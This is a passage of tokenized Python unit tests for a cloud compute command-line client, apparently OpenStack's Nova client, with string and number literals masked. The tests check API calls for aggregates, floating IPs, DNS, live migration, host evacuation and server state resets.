'<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> def test_restore ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_restore_withname ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } , <EOL> pos = <NUM_LIT:2> ) <EOL> def test_delete_two_with_two_existent ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:5> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = - <NUM_LIT:6> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:5> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , <EOL> pos = - <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_delete_two_with_two_existent_all_tenants ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , <EOL> pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = <NUM_LIT:5> ) <EOL> def test_delete_two_with_one_nonexistent ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> self . assert_called_anytime ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> self . assert_called_anytime ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_delete_one_with_one_nonexistent ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_delete_two_with_two_nonexistent ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_diagnostics ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_refresh_network ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : [ { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> } ] } ) <EOL> def test_set_meta_set ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_set_meta_delete_dict ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> def test_set_meta_delete_keys ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> def test_set_host_meta ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } , <EOL> pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } , <EOL> pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } , <EOL> pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } , <EOL> pos = <NUM_LIT:4> ) <EOL> def test_set_host_meta_with_no_servers ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_delete_host_meta ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> def test_dns_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def test_dns_create_public_domain ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_dns_create_private_domain ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_dns_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def test_dns_delete_domain ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_dns_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_dns_domains ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_floating_ip_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_floating_ip_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_floating_ip_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_floating_ip_bulk_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_floating_ip_bulk_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_floating_ip_bulk_create_host_and_interface ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_floating_ip_bulk_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_server_floating_ip_add ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:address>' : '<STR_LIT>' } } ) <EOL> def test_server_floating_ip_remove ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:address>' : '<STR_LIT>' } } ) <EOL> def test_server_floating_ip_associate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:address>' : '<STR_LIT>' } } ) <EOL> def test_server_floating_ip_disassociate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:address>' : '<STR_LIT>' } } ) <EOL> def test_usage_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> def test_usage_list_no_args ( self ) : <EOL> timeutils . set_time_override ( datetime . datetime ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> self . addCleanup ( timeutils . clear_time_override ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> def test_usage ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> def test_usage_no_tenant ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> def test_flavor_delete ( self ) : <EOL> self . run_command ( "<STR_LIT>" ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_flavor_create ( self ) : <EOL> self . run_command ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_aggregate_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_delete_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_aggregate_delete_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_aggregate_update_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_update_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_update_with_availability_zone_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT:foo>" , "<STR_LIT>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_update_with_availability_zone_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT:foo>" , "<STR_LIT>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_set_metadata_add_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT:foo>" : "<STR_LIT:bar>" } } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_set_metadata_add_duplicate_by_id ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_aggregate_set_metadata_delete_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT>" : None } } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_set_metadata_delete_missing_by_id ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_aggregate_set_metadata_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT:foo>" : "<STR_LIT:bar>" } } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_add_host_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:host>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_add_host_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:host>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_remove_host_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:host>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_remove_host_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:host>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_details_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_aggregate_details_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_aggregate_show_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_aggregate_show_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_live_migration ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False } } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } } ) <EOL> def test_live_migration_v225 ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' , api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } ) <EOL> self . run_command ( '<STR_LIT>' , api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_live_migration_force_complete ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> def test_list_migrations ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_get_migration ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_live_migration_abort ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_host_evacuate_live_with_no_target_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_2_25 ( self ) : <EOL> self . run_command ( '<STR_LIT>' , api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_with_target_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_with_block_migration ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_with_block_migration_2_25 ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , '<STR_LIT>' : True } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_with_disk_over_commit ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_with_disk_over_commit_2_25 ( self ) : <EOL> self . assertRaises ( SystemExit , self . run_command , <EOL> '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> def test_host_evacuate_list_with_max_servers ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> def test_reset_state ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT:error>' } } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT>' } } ) <EOL> def test_reset_state_with_all_tenants ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT:error>' } } ) <EOL> def test_reset_state_multiple ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT:error>' } } , pos = - <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT:error>' } } , pos = - <NUM_LIT:1> ) <EOL> def test_reset_state_active_multiple ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT>' } } , pos = - <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT>' } } , pos = - 